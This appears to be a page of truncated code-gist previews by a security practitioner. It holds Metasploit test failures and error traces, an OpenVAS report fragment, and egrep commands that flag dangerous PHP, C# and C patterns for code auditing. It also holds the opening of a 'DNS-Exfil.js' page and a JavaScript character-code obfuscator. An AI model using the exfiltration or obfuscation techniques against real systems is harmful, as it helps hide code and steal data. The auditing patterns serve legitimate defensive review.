This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
rspec ./spec/lib/msf/util/exe_spec.rb:65 # Msf::Util::EXE.to_executable_fmt with platform=linux returns an executable when given arch=mipsbe, fmt=elf | |
rspec ./spec/lib/msf/util/exe_spec.rb:65 # Msf::Util::EXE.to_executable_fmt with platform=linux returns an executable when given arch=mipsle, fmt=elf | |
rspec ./spec/lib/rex/socket/range_walker_spec.rb:29 # Rex::Socket::RangeWalker.new with an invalid hostname should not be valid | |
rspec ./spec/lib/rex/socket/range_walker_spec.rb:34 # Rex::Socket::RangeWalker.new with an invalid hostname and CIDR should not be valid | |
Failure/Error: verify_bin_fingerprint(format_hash, bin) | |
expected: /ELF 32-bit MSB executable, MIPS/ | |
got: "/dev/stdin: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, corrupted section header size\n" (using =~) | |
Diff: | |
@@ -1,2 +1,2 @@ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
--- ../Gemfile.lock 2014-04-25 21:35:15.353280736 +0000 | |
+++ Gemfile.lock 2014-04-25 23:05:47.249280736 +0000 | |
@@ -1,27 +1,27 @@ | |
GEM | |
remote: https://rubygems.org/ | |
specs: | |
- activemodel (3.2.14) | |
- activesupport (= 3.2.14) | |
+ activemodel (3.2.17) | |
+ activesupport (= 3.2.17) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
msf > openvas_report_import 1 11 | |
[*] Importing report to database. | |
[-] Error while running command openvas_report_import: getaddrinfo: Name or service not known | |
Call stack: | |
/home/nick/metasploit-framework/lib/rex/socket.rb:181:in `gethostbyname' | |
/home/nick/metasploit-framework/lib/rex/socket.rb:181:in `getaddresses' | |
/home/nick/metasploit-framework/lib/rex/socket.rb:165:in `getaddress' | |
/home/nick/metasploit-framework/lib/msf/core/db_manager/host.rb:93:in `normalize_host' | |
/home/nick/metasploit-framework/lib/msf/core/db_manager/host.rb:160:in `block in report_host' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<report content_type='text/xml' extension='xml' format_id='a994b278-1f62-11e1-96ac-406186ea4fc5' id='7fa042b4-55ee-4ece-a647-7f2288e24b5c' type='scan'><owner><name/></owner><name>2015-01-12T01:24:46Z</name><comment/><creation_time>2015-01-12T01:24:46Z</creation_time><modification_time>2015-01-12T01:32:42Z</modification_time><writable>0</writable><in_use>0</in_use><report id='7fa042b4-55ee-4ece-a647-7f2288e24b5c'><report_format/><sort><field>type<order>descending</order></field></sort><filters id='0'><term>sort-reverse=ROWID result_hosts_only=1 min_cvss_base= levels=hmlgd autofp=0 notes=0 overrides=0 first=1 rows=-1 delta_states=cgns</term>hmlgd<phrase/><autofp>0</autofp><notes>0</notes><overrides>0</overrides><apply_overrides>0</apply_overrides><result_hosts_only>1</result_hosts_only><min_cvss_base/><filter>High</filter><filter>Medium</filter><filter>Low</filter><filter>Log</filter><filter>Debug</filter></filters><severity_class id='d4c74cda-89e1-11e3-9c29-406186ea4fc5'><name>nist</name><full_name>NVD Vulnera |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# searches for {{{ or }}} in all .handlebars or .hbs files | |
# {{{ and }}} signify unsafe template parameters in EmberJS | |
# tested on OS X 10.10 | |
egrep -r --include "*.handlebars" --include "*.hbs" "\{\{\{|\}\}\}" . |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Returns instances where anti xss measures are deployed | |
egrep -r --include "*.cs" -e "(AntiXssEncoder|Server\.HtmlEncode|Html.Encode)" . | |
# Returns possible command injection areas | |
egrep -r --include "*.cs" -e "(Process|Process\.Start)\(" . | |
# Returns possible xss scenarios (string concatention in HTML/XML) | |
egrep -r --include "*.cs" -e "<.*>\"\s*\+.*\+\s*\"<.*>" . | |
# Returns places where anti csrf measure are deployed |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# see all character arrays of any hardcoded length | |
egrep --include "*.c*" -rnI -e 'char\s+[a-zA-Z0-9]+\[\d+\]' . |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# this command searches all PHP files in a directory for vulnerable shell functions | |
egrep -r --include "*.php" -e "(system|exec|popen|pcntl_exec|proc_open)\(" . | |
# this command searches all PHP files in a directory for certain vulnerable php execution functions | |
egrep -r --include "*.php" -e "(eval|assert|preg_replace)\(" . | |
# this command returns instances where variables are echoed out without htmlspecialchars() | |
# it can be useful for finding XSS vulnerabilities in PHP code | |
egrep -r --include "*.php" -e "echo\s*\\$.*;" . |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html style="width:100%;height:100%;"> | |
<head> | |
<title>DNS-Exfil.js</title> | |
<script> | |
var targetId = Math.round(Math.random() * 1000000); | |
var sessionId = guid(); | |
function doRequest(){ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function rewrite(text) { | |
var obs = ""; | |
for (var i = 0; i < text.length; i++) { | |
obs += "(function() { return String.fromCharCode(" + text[i].charCodeAt(0) + "); })() + "; | |
} | |
obs += ' ""'; | |
return obs; | |
} | |
var n = rewrite('console.log("test")'); |
OlderNewer